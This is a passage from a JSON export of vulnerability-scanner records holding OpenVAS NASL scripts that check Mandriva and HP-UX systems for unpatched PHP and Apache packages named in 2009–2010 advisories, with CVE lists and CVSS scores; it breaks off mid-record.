rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-simplexml\", rpm:\"php-simplexml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-suhosin\", rpm:\"php-suhosin~0.9.22~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3546", "CVE-2009-3558", "CVE-2009-1271", "CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.", "modified": "2018-04-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:136141256231066420", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066420", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:324 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_324.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:324 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:324\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66420\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-1271\", \"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3546\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:324 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.4~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-simplexml\", rpm:\"php-simplexml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-suhosin\", rpm:\"php-suhosin~0.9.22~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:04:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "Check for the Version of Apache with PHP", "modified": "2018-01-18T00:00:00", "published": "2010-06-23T00:00:00", "id": "OPENVAS:1361412562310835236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835236", "type": "openvas", "title": "HP-UX Update for Apache with PHP HPSBUX02543", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache with PHP HPSBUX02543\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\n unauthorized Access\n cross site scripting (XSS).\";\ntag_affected = \"Apache with PHP on\n HP-UX B.11.11, B.11.23, B.11.31 running Apache with PHP v5.2.6 or earlier.\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache with PHP. These vulnerabilities could be exploited remotely to create \n a Denial of Service (DoS) gain unauthorized access, and perform cross site \n scripting (XSS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02247738\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835236\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02543\");\n script_cve_id(\"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3557\", \"CVE-2009-4017\", \"CVE-2009-4018\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n script_name(\"HP-UX Update for Apache with PHP HPSBUX02543\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Apache with PHP\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:32:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "Check for the Version of Apache with PHP", "modified": "2017-12-21T00:00:00", "published": "2010-06-23T00:00:00", "id": "OPENVAS:835236", "href": 